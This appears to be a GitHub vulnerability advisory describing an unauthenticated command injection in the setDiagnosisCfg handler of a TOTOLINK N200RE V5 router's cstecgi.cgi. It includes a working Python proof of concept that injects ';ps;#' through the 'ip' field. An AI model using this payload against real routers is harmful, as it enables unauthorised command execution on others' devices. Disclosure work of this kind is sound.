Skip to content

Latest commit

 

History

History
29 lines (21 loc) · 959 Bytes

README.md

File metadata and controls

29 lines (21 loc) · 959 Bytes

TOTOLINK N200RE V5(V9.3.5u.6139_B20201216) router has command injection vulnerability

Information

Vendor:http://totolink.net/

Firmware:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html

Affected Version

V9.3.5u.6139_B20201216

Vulnerability Analysis

The following image displays the code for a command injection vulnerability in the setDiagnosisCfg handler function of cstecgi.cgi. The value of the ip parameter will be spliced ​​into the ping %s -w ... and be excuted by doSystem function, which allows an attacker to excute any command. The vulnerability do not need authentication.

Vulnerability

POC

import requests

url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

payload = """{
    "topicurl": "setDiagnosisCfg",
    "num": "123",
    "ip": ";ps;#"
}"""

requests.request("POST", url, data=payload)

postman